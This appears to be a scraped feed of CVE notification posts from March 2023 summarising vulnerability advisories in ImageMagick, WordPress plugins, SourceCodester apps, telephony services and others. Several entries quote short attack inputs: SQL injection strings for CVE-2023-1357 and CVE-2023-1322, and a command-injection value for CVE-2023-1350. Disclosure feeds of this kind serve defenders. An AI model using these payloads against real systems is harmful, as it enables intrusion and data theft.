| 2023-03-12 11:29:55 |
🚨 CVE-2023-1357A vulnerability, which was classified as critical, has been found in SourceCodester Simple Bakery Shop Management System 1.0. Affected by this issue is some unknown functionality of the component Admin Login. The manipulation of the argument username/password with the input admin' or 1=1 -- leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222860.🎖@cveNotify |
|
| 2023-03-12 11:29:54 |
🚨 CVE-2023-1358A vulnerability, which was classified as critical, was found in SourceCodester Gadget Works Online Ordering System 1.0. This affects an unknown part of the file /philosophy/admin/login.php of the component POST Parameter Handler. The manipulation of the argument user_email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222861 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-12 11:29:53 |
🚨 CVE-2023-1359A vulnerability has been found in SourceCodester Gadget Works Online Ordering System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /philosophy/admin/user/controller.php?action=add of the component Add New User. The manipulation of the argument U_NAME leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-222862 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-12 07:30:05 |
🚨 CVE-2021-46875An issue was discovered in eZ Platform Ibexa Kernel before 1.3.1.1. An XSS attack can occur because JavaScript code can be uploaded in a .html or .js file.🎖@cveNotify |
|
| 2023-03-12 07:30:04 |
🚨 CVE-2021-46876An issue was discovered in eZ Publish Ibexa Kernel before 7.5.15.1. The /user/sessions endpoint can be abused to determine account existence.🎖@cveNotify |
|
| 2023-03-12 07:30:02 |
🚨 CVE-2022-48365An issue was discovered in eZ Platform Ibexa Kernel before 1.3.26. The Company admin role gives excessive privileges.🎖@cveNotify |
|
| 2023-03-12 07:30:00 |
🚨 CVE-2022-48366An issue was discovered in eZ Platform Ibexa Kernel before 1.3.19. It allows determining account existence via a timing attack.🎖@cveNotify |
|
| 2023-03-12 07:29:59 |
🚨 CVE-2022-48367An issue was discovered in eZ Publish Ibexa Kernel before 7.5.28. Access control based on object state is mishandled.🎖@cveNotify |
|
| 2023-03-12 07:29:58 |
🚨 CVE-2020-19824An issue in MPV v.0.29.1 fixed in v0.30 allows attackers to execute arbitrary code and crash program via the ao_c parameter.🎖@cveNotify |
|
| 2023-03-12 02:30:27 |
🚨 CVE-2020-27754In IntensityCompare() of /magick/quantize.c, there are calls to PixelPacketIntensity() which could return overflowed values to the caller when ImageMagick processes a crafted input file. To mitigate this, the patch introduces and uses the ConstrainPixelIntensity() function, which forces the pixel intensities to be within the proper bounds in the event of an overflow. This flaw affects ImageMagick versions prior to 6.9.10-69 and 7.0.8-69.🎖@cveNotify |
|
| 2023-03-12 02:30:26 |
🚨 CVE-2020-25675In the CropImage() and CropImageToTiles() routines of MagickCore/transform.c, rounding calculations performed on unconstrained pixel offsets was causing undefined behavior in the form of integer overflow and out-of-range values as reported by UndefinedBehaviorSanitizer. Such issues could cause a negative impact to application availability or other problems related to undefined behavior, in cases where ImageMagick processes untrusted input data. The upstream patch introduces functionality to constrain the pixel offsets and prevent these issues. This flaw affects ImageMagick versions prior to 7.0.9-0.🎖@cveNotify |
|
| 2023-03-12 02:30:25 |
🚨 CVE-2020-27756In ParseMetaGeometry() of MagickCore/geometry.c, image height and width calculations can lead to divide-by-zero conditions which also lead to undefined behavior. This flaw can be triggered by a crafted input file processed by ImageMagick and could impact application availability. The patch uses multiplication in addition to the function `PerceptibleReciprocal()` in order to prevent such divide-by-zero conditions. This flaw affects ImageMagick versions prior to 7.0.9-0.🎖@cveNotify |
|
| 2023-03-12 02:30:24 |
🚨 CVE-2020-27750A flaw was found in ImageMagick in MagickCore/colorspace-private.h and MagickCore/quantum.h. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of values outside the range of type `unsigned char` and math division by zero. This would most likely lead to an impact to application availability, but could potentially cause other problems related to undefined behavior. This flaw affects ImageMagick versions prior to 7.0.8-68.🎖@cveNotify |
|
| 2023-03-12 02:30:20 |
🚨 CVE-2020-25674WriteOnePNGImage() from coders/png.c (the PNG coder) has a for loop with an improper exit condition that can allow an out-of-bounds READ via heap-buffer-overflow. This occurs because it is possible for the colormap to have less than 256 valid values but the loop condition will loop 256 times, attempting to pass invalid colormap data to the event logger. The patch replaces the hardcoded 256 value with a call to MagickMin() to ensure the proper value is used. This could impact application availability when a specially crafted input file is processed by ImageMagick. This flaw affects ImageMagick versions prior to 7.0.8-68.🎖@cveNotify |
|
| 2023-03-12 02:30:19 |
🚨 CVE-2020-25666There are 4 places in HistogramCompare() in MagickCore/histogram.c where an integer overflow is possible during simple math calculations. This occurs in the rgb values and `count` value for a color. The patch uses casts to `ssize_t` type for these calculations, instead of `int`. This flaw could impact application reliability in the event that ImageMagick processes a crafted input file. This flaw affects ImageMagick versions prior to 7.0.9-0.🎖@cveNotify |
|
| 2023-03-12 02:30:18 |
🚨 CVE-2020-27757A floating point math calculation in ScaleAnyToQuantum() of /MagickCore/quantum-private.h could lead to undefined behavior in the form of a value outside the range of type unsigned long long. The flaw could be triggered by a crafted input file under certain conditions when it is processed by ImageMagick. Red Hat Product Security marked this as Low because although it could potentially lead to an impact to application availability, no specific impact was shown in this case. This flaw affects ImageMagick versions prior to 7.0.8-68.🎖@cveNotify |
|
| 2023-03-12 02:30:17 |
🚨 CVE-2020-29599ImageMagick before 6.9.11-40 and 7.x before 7.0.10-40 mishandles the -authenticate option, which allows setting a password for password-protected PDF files. The user-controlled password was not properly escaped/sanitized and it was therefore possible to inject additional shell commands via coders/pdf.c.🎖@cveNotify |
|
| 2023-03-12 02:30:16 |
🚨 CVE-2020-27776A flaw was found in ImageMagick in MagickCore/statistic.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of values outside the range of type unsigned long. This would most likely lead to an impact to application availability, but could potentially cause other problems related to undefined behavior. This flaw affects ImageMagick versions prior to 7.0.9-0.🎖@cveNotify |
|
| 2023-03-12 02:30:12 |
🚨 CVE-2020-27774A flaw was found in ImageMagick in MagickCore/statistic.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of a too large shift for 64-bit type `ssize_t`. This would most likely lead to an impact to application availability, but could potentially cause other problems related to undefined behavior. This flaw affects ImageMagick versions prior to 7.0.9-0.🎖@cveNotify |
|
| 2023-03-12 02:30:11 |
🚨 CVE-2020-27775A flaw was found in ImageMagick in MagickCore/quantum.h. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of values outside the range of type unsigned char. This would most likely lead to an impact to application availability, but could potentially cause other problems related to undefined behavior. This flaw affects ImageMagick versions prior to 7.0.9-0.🎖@cveNotify |
|
| 2023-03-12 02:30:10 |
🚨 CVE-2020-27772A flaw was found in ImageMagick in coders/bmp.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of values outside the range of type `unsigned int`. This would most likely lead to an impact to application availability, but could potentially cause other problems related to undefined behavior. This flaw affects ImageMagick versions prior to 7.0.9-0.🎖@cveNotify |
|
| 2023-03-12 02:30:09 |
🚨 CVE-2020-27767A flaw was found in ImageMagick in MagickCore/quantum.h. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of values outside the range of types `float` and `unsigned char`. This would most likely lead to an impact to application availability, but could potentially cause other problems related to undefined behavior. This flaw affects ImageMagick versions prior to 7.0.9-0.🎖@cveNotify |
|
| 2023-03-12 02:30:05 |
🚨 CVE-2020-27771In RestoreMSCWarning() of /coders/pdf.c there are several areas where calls to GetPixelIndex() could result in values outside the range of representable for the unsigned char type. The patch casts the return value of GetPixelIndex() to ssize_t type to avoid this bug. This undefined behavior could be triggered when ImageMagick processes a crafted pdf file. Red Hat Product Security marked this as Low severity because although it could potentially lead to an impact to application availability, no specific impact was demonstrated in this case. This flaw affects ImageMagick versions prior to 7.0.9-0.🎖@cveNotify |
|
| 2023-03-12 02:30:04 |
🚨 CVE-2020-27766A flaw was found in ImageMagick in MagickCore/statistic.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of values outside the range of type `unsigned long`. This would most likely lead to an impact to application availability, but could potentially cause other problems related to undefined behavior. This flaw affects ImageMagick versions prior to 7.0.8-69.🎖@cveNotify |
|
| 2023-03-12 02:30:03 |
🚨 CVE-2020-27765A flaw was found in ImageMagick in MagickCore/segment.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of math division by zero. This would most likely lead to an impact to application availability, but could potentially cause other problems related to undefined behavior. This flaw affects ImageMagick versions prior to 7.0.9-0.🎖@cveNotify |
|
| 2023-03-12 02:30:02 |
🚨 CVE-2020-27763A flaw was found in ImageMagick in MagickCore/resize.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of math division by zero. This would most likely lead to an impact to application availability, but could potentially cause other problems related to undefined behavior. This flaw affects ImageMagick versions prior to 7.0.8-68.🎖@cveNotify |
|
| 2023-03-12 00:29:38 |
🚨 CVE-2023-1355NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1402.🎖@cveNotify |
|
| 2023-03-12 00:29:37 |
🚨 CVE-2013-10021A vulnerability was found in dd32 Debug Bar Plugin up to 0.8. It has been declared as problematic. Affected by this vulnerability is the function render of the file panels/class-debug-bar-queries.php. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 0.8.1 is able to address this issue. The name of the patch is 0842af8f8a556bc3e39b9ef758173b0a8a9ccbfc. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-222739.🎖@cveNotify |
|
| 2023-03-11 20:29:38 |
🚨 CVE-2023-1353A vulnerability, which was classified as problematic, was found in SourceCodester Design and Implementation of Covid-19 Directory on Vaccination System 1.0. Affected is an unknown function of the file verification.php. The manipulation of the argument txtvaccinationID leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222852.🎖@cveNotify |
|
| 2023-03-11 20:29:37 |
🚨 CVE-2023-1354A vulnerability has been found in SourceCodester Design and Implementation of Covid-19 Directory on Vaccination System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file register.php. The manipulation of the argument txtfullname/txtage/txtaddress/txtphone leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222853 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-11 14:29:36 |
🚨 CVE-2023-1351A vulnerability classified as critical has been found in SourceCodester Computer Parts Sales and Inventory System 1.0. This affects an unknown part of the file cust_transac.php. The manipulation of the argument phonenumber leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222849 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-11 12:29:46 |
🚨 CVE-2023-1349A vulnerability, which was classified as problematic, has been found in Hsycms 3.1. Affected by this issue is some unknown functionality of the file controller\cate.php of the component Add Category Module. The manipulation of the argument title leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-222842 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-11 12:29:44 |
🚨 CVE-2023-1350A vulnerability was found in liferea. It has been rated as critical. Affected by this issue is the function update_job_run of the file src/update.c of the component Feed Enrichment. The manipulation of the argument source with the input |date >/tmp/bad-item-link.txt leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 8d8b5b963fa64c7a2122d1bbfbb0bed46e813e59. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-222848.🎖@cveNotify |
|
| 2023-03-11 12:29:43 |
🚨 CVE-2022-4645LibTIFF 4.4.0 has an out-of-bounds read in tiffcp in tools/tiffcp.c:948, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit e8131125.🎖@cveNotify |
|
| 2023-03-11 12:29:42 |
🚨 CVE-2023-24580An issue was discovered in the Multipart Request Parser in Django 3.2 before 3.2.18, 4.0 before 4.0.10, and 4.1 before 4.1.7. Passing certain inputs (e.g., an excessive number of parts) to multipart forms could result in too many open files or memory exhaustion, and provided a potential vector for a denial-of-service attack.🎖@cveNotify |
|
| 2023-03-11 12:29:40 |
🚨 CVE-2023-22895The bzip2 crate before 0.4.4 for Rust allow attackers to cause a denial of service via a large file that triggers an integer overflow in mem.rs. NOTE: this is unrelated to the https://crates.io/crates/bzip2-rs product.🎖@cveNotify |
|
| 2023-03-11 12:29:39 |
🚨 CVE-2022-43272DCMTK v3.6.7 was discovered to contain a memory leak via the T_ASC_Association object.🎖@cveNotify |
|
| 2023-03-11 12:29:38 |
🚨 CVE-2022-41323In Django 3.2 before 3.2.16, 4.0 before 4.0.8, and 4.1 before 4.1.2, internationalized URLs were subject to a potential denial of service attack via the locale parameter, which is treated as a regular expression.🎖@cveNotify |
|
| 2023-03-11 12:29:37 |
🚨 CVE-2022-31081HTTP::Daemon is a simple http server class written in perl. Versions prior to 6.15 are subject to a vulnerability which could potentially be exploited to gain privileged access to APIs or poison intermediate caches. It is uncertain how large the risks are, most Perl based applications are served on top of Nginx or Apache, not on the `HTTP::Daemon`. This library is commonly used for local development and tests. Users are advised to update to resolve this issue. Users unable to upgrade may add additional request handling logic as a mitigation. After calling `my $rqst = $conn->get_request()` one could inspect the returned `HTTP::Request` object. Querying the 'Content-Length' (`my $cl = $rqst->header('Content-Length')`) will show any abnormalities that should be dealt with by a `400` response. Expected strings of 'Content-Length' SHOULD consist of either a single non-negative integer, or, a comma separated repetition of that number. (that is `42` or `42, 42, 42`). Anything else MUST be rejected.🎖@cveNotify |
|
| 2023-03-11 06:29:59 |
🚨 CVE-2022-4265The Replyable WordPress plugin before 2.2.10 does not validate the class name submitted by the request when instantiating an object in the prompt_dismiss_notice action and also lacks CSRF check in the related action. This could allow any authenticated users, such as subscriber to perform Object Injection attacks. The attack could also be done via a CSRF vector against any authenticated user🎖@cveNotify |
|
| 2023-03-11 06:29:58 |
🚨 CVE-2023-1197Cross-site Scripting (XSS) - Stored in GitHub repository uvdesk/community-skeleton prior to 1.1.0.🎖@cveNotify |
|
| 2023-03-11 06:29:56 |
🚨 CVE-2023-1200A vulnerability was found in ehuacui bbs. It has been declared as problematic. This vulnerability affects unknown code. The manipulation of the argument username leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-222388.🎖@cveNotify |
|
| 2023-03-11 06:29:55 |
🚨 CVE-2023-24789jeecg-boot v3.4.4 was discovered to contain an authenticated SQL injection vulnerability via the building block report component.🎖@cveNotify |
|
| 2023-03-11 06:29:54 |
🚨 CVE-2023-0328The WPCode WordPress plugin before 2.0.7 does not have adequate privilege checks in place for several AJAX actions, only checking the nonce. This may lead to allowing any authenticated user who can edit posts to call the endpoints related to WPCode Library authentication (such as update and delete the auth key).🎖@cveNotify |
|
| 2023-03-11 06:29:53 |
🚨 CVE-2023-0212The Advanced Recent Posts WordPress plugin through 0.6.14 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-11 06:29:51 |
🚨 CVE-2023-24999HashiCorp Vault and Vault Enterprise’s approle auth method allowed any authenticated user with access to an approle destroy endpoint to destroy the secret ID of any other role by providing the secret ID accessor. This vulnerability is fixed in Vault 1.13.0, 1.12.4, 1.11.8, 1.10.11 and above.🎖@cveNotify |
|
| 2023-03-11 06:29:50 |
🚨 CVE-2022-25655Memory corruption in WLAN HAL while arbitrary value is passed in WMI UTF command payload.🎖@cveNotify |
|
| 2023-03-11 06:29:49 |
🚨 CVE-2022-40530Memory corruption in WLAN due to integer overflow to buffer overflow in WLAN during initialization phase.🎖@cveNotify |
|
| 2023-03-11 06:29:48 |
🚨 CVE-2022-40539Memory corruption in Automotive Android OS due to improper validation of array index.🎖@cveNotify |
|
| 2023-03-11 06:29:46 |
🚨 CVE-2022-47457In wlan driver, there is a possible missing params check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-03-11 06:29:45 |
🚨 CVE-2022-47459In wlan driver, there is a possible missing params check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-03-11 06:29:44 |
🚨 CVE-2022-47462In telephone service, there is a missing permission check. This could lead to local escalation of privilege with system execution privileges needed.🎖@cveNotify |
|
| 2023-03-11 06:29:43 |
🚨 CVE-2022-47471In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-11 06:29:42 |
🚨 CVE-2022-47474In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-11 06:29:40 |
🚨 CVE-2022-47475In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-11 06:29:39 |
🚨 CVE-2022-47476In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-11 06:29:38 |
🚨 CVE-2022-47477In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-11 06:29:37 |
🚨 CVE-2022-47478In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-11 06:29:36 |
🚨 CVE-2022-47479In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-11 00:29:48 |
🚨 CVE-2022-40530Memory corruption in WLAN due to integer overflow to buffer overflow in WLAN during initialization phase.🎖@cveNotify |
|
| 2023-03-11 00:29:47 |
🚨 CVE-2022-47457In wlan driver, there is a possible missing params check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-03-11 00:29:43 |
🚨 CVE-2022-47462In telephone service, there is a missing permission check. This could lead to local escalation of privilege with system execution privileges needed.🎖@cveNotify |
|
| 2023-03-11 00:29:42 |
🚨 CVE-2022-47474In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-11 00:29:41 |
🚨 CVE-2022-47475In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-11 00:29:37 |
🚨 CVE-2022-47477In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-11 00:29:36 |
🚨 CVE-2022-47479In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-11 00:29:35 |
🚨 CVE-2022-47480In telephony service, there is a missing permission check. This could lead to local denial of service in telephone service with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-10 21:31:30 |
🚨 CVE-2023-1333The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the clear_page_cache function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to delete the plugin's cache.🎖@cveNotify |
|
| 2023-03-10 21:31:29 |
🚨 CVE-2023-1334The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized cache modification due to a missing capability check on the queue_posts function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to modify the plugin's cache.🎖@cveNotify |
|
| 2023-03-10 21:31:28 |
🚨 CVE-2023-1335The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the ucss_connect function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to connect a new license key to the site.🎖@cveNotify |
|
| 2023-03-10 21:31:27 |
🚨 CVE-2023-1336The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check on the ajax_deactivate function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to disable caching.🎖@cveNotify |
|
| 2023-03-10 21:31:26 |
🚨 CVE-2023-1337The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the clear_uucss_logs function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to delete plugin log files.🎖@cveNotify |
|
| 2023-03-10 21:31:21 |
🚨 CVE-2023-1338The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized cache modification due to a missing capability check on the attach_rule function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to modify cache rules.🎖@cveNotify |
|
| 2023-03-10 21:31:20 |
🚨 CVE-2023-1339The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check on the uucss_update_rule function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to update caching rules.🎖@cveNotify |
|
| 2023-03-10 21:31:19 |
🚨 CVE-2023-1341The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the ajax_deactivate function. This makes it possible for unauthenticated attackers to turn off caching via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-03-10 21:31:18 |
🚨 CVE-2023-1342The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the ucss_connect function. This makes it possible for unauthenticated attackers to connect the site to a new license key via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-03-10 21:31:13 |
🚨 CVE-2023-1343The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the attach_rule function. This makes it possible for unauthenticated attackers to modify the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-03-10 21:31:12 |
🚨 CVE-2023-1344The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the uucss_update_rule function. This makes it possible for unauthenticated attackers to modify the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-03-10 21:31:11 |
🚨 CVE-2023-1345The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the queue_posts function. This makes it possible for unauthenticated attackers to modify the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-03-10 21:31:10 |
🚨 CVE-2023-22751There are stack-based buffer overflow vulnerabilities that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks access point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-03-10 21:31:05 |
🚨 CVE-2023-22752There are stack-based buffer overflow vulnerabilities that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks access point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-03-10 21:31:04 |
🚨 CVE-2023-22754There are buffer overflow vulnerabilities in multiple underlying operating system processes that could lead to unauthenticated remote code execution by sending specially crafted packets via the PAPI protocol. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-03-10 21:31:03 |
🚨 CVE-2023-22755There are buffer overflow vulnerabilities in multiple underlying operating system processes that could lead to unauthenticated remote code execution by sending specially crafted packets via the PAPI protocol. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-03-10 21:31:02 |
🚨 CVE-2023-22756There are buffer overflow vulnerabilities in multiple underlying operating system processes that could lead to unauthenticated remote code execution by sending specially crafted packets via the PAPI protocol. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-03-10 19:30:00 |
🚨 CVE-2023-1131A vulnerability has been found in SourceCodester Computer Parts Sales and Inventory System 1.0 and classified as problematic. This vulnerability affects unknown code of the file customer.php. The manipulation of the argument FIRST_NAME/LAST_NAME/PHONE_NUMBER leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-222106 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-10 19:29:59 |
🚨 CVE-2022-46501Accruent LLC Maintenance Connection 2021 (all) & 2022.2 was discovered to contain a SQL injection vulnerability via the E-Mail to Work Order function.🎖@cveNotify |
|
| 2023-03-10 19:29:58 |
🚨 CVE-2022-35645IBM Maximo Asset Management 7.6.1.1, 7.6.1.2, 7.6.1.3 and IBM Maximo Application Suite 8.8 and 8.9 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 230958.🎖@cveNotify |
|
| 2023-03-10 19:29:57 |
🚨 CVE-2023-1157A vulnerability, which was classified as problematic, was found in finixbit elf-parser. Affected is the function elf_parser::Elf_parser::get_segments of the file elf_parser.cpp. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-222222 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-10 19:29:56 |
🚨 CVE-2023-1130A vulnerability, which was classified as critical, was found in SourceCodester Computer Parts Sales and Inventory System 1.0. This affects an unknown part of the file processlogin. The manipulation of the argument user leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222105 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-10 19:29:55 |
🚨 CVE-2023-25221Libde265 v1.0.10 was discovered to contain a heap-buffer-overflow vulnerability in the derive_spatial_luma_vector_prediction function in motion.cc.🎖@cveNotify |
|
| 2023-03-10 19:29:54 |
🚨 CVE-2023-24758libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_weighted_pred_avg_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file.🎖@cveNotify |
|
| 2023-03-10 19:29:53 |
🚨 CVE-2023-1149Improper Neutralization of Equivalent Special Elements in GitHub repository btcpayserver/btcpayserver prior to 1.8.0.🎖@cveNotify |
|
| 2023-03-10 19:29:52 |
🚨 CVE-2023-24757libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the put_unweighted_pred_16_fallback function at fallback-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file.🎖@cveNotify |
|
| 2023-03-10 19:29:50 |
🚨 CVE-2023-24756libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_unweighted_pred_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file.🎖@cveNotify |
|
| 2023-03-10 19:29:46 |
🚨 CVE-2023-24755libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the put_weighted_pred_8_fallback function at fallback-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file.🎖@cveNotify |
|
| 2023-03-10 19:29:45 |
🚨 CVE-2023-24754libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_weighted_pred_avg_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file.🎖@cveNotify |
|
| 2023-03-10 19:29:44 |
🚨 CVE-2022-41044Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-03-10 19:29:43 |
🚨 CVE-2022-41045Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-03-10 19:29:39 |
🚨 CVE-2022-41047Microsoft ODBC Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-03-10 19:29:38 |
🚨 CVE-2022-41048Microsoft ODBC Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-03-10 19:29:37 |
🚨 CVE-2022-41049Windows Mark of the Web Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-03-10 19:29:36 |
🚨 CVE-2022-41052Windows Graphics Component Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-03-10 18:29:57 |
🚨 CVE-2023-1322A vulnerability was found in lmxcms 1.41 and classified as critical. Affected by this issue is the function reply of the file BookAction.class.php. The manipulation of the argument id with the input 1) and updatexml(0,concat(0x7e,user()),1)# leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222728.🎖@cveNotify |
|
| 2023-03-10 18:29:56 |
🚨 CVE-2023-27161Jellyfin up to v10.7.7 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /Repositories. This vulnerability allows attackers to access network resources and sensitive information via a crafted POST request.🎖@cveNotify |
|
| 2023-03-10 18:29:55 |
🚨 CVE-2023-27164An arbitrary file upload vulnerability in Halo up to v1.6.1 allows attackers to execute arbitrary code via a crafted .md file.🎖@cveNotify |
|
| 2023-03-10 18:29:54 |
